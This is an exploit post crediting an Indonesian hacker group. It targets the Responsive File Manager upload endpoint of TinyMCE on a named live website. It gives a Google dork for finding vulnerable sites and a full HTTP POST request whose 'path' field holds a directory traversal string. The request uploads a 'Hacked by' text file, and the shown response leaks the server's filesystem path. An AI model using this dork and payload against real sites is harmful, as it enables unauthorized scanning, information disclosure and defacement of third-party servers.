Live Target: http://pfionline.co.in/assets/tinymce/filemanager/dialog.php Author: L4663r666h05t In this case, you need Burpsuite. Note: if burpsuite is usually used to intercept, then here I am just trying to make it wrong directory then the response form will appear in the path of the victim's website using responsive file manager. Dork: inurl:/filemanager/css/ Exploit: /filemanager/dialog.php Step One: https://pasteboard.co/IFjDTTA.jpg Step Two: https://pasteboard.co/IFjE8h2.jpg Last Step: https://pasteboard.co/IFjEk2R.jpg REQUEST: POST /assets/tinymce/filemanager/upload.php HTTP/1.1 Host: user.com Content-Length: 439 Accept: application/json Cache-Control: no-cache Origin: http://user.com/ X-Requested-With: XMLHttpRequest User-Agent: - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWwXMWsA3nGDOf2uC Referer: http://user.com/assets/tinymce/filemanager/dialog.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=ae94241e4e4aa41cfe39c424950d3eac Connection: close ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="path" ../../../blablabla ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="path_thumb" ../thumbs/ ------WebKitFormBoundaryWwXMWsA3nGDOf2uC Content-Disposition: form-data; name="file"; filename="world.txt" Content-Type: text/plain Hacked by L4663r666h05t ------WebKitFormBoundaryWwXMWsA3nGDOf2uC-- RESPONSE: HTTP/1.1 200 OK Date: Tue, 05 Nov 2019 18:26:56 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Length: 84 Content-Type: text/html; charset=UTF-8 wrong path (@/home/user/public_html/assets/tinymce/filemanager/upload.php#53) Path Leaked: /home/user/public_html/ Thanks to: Indonesian Code Party - Exploiter.ID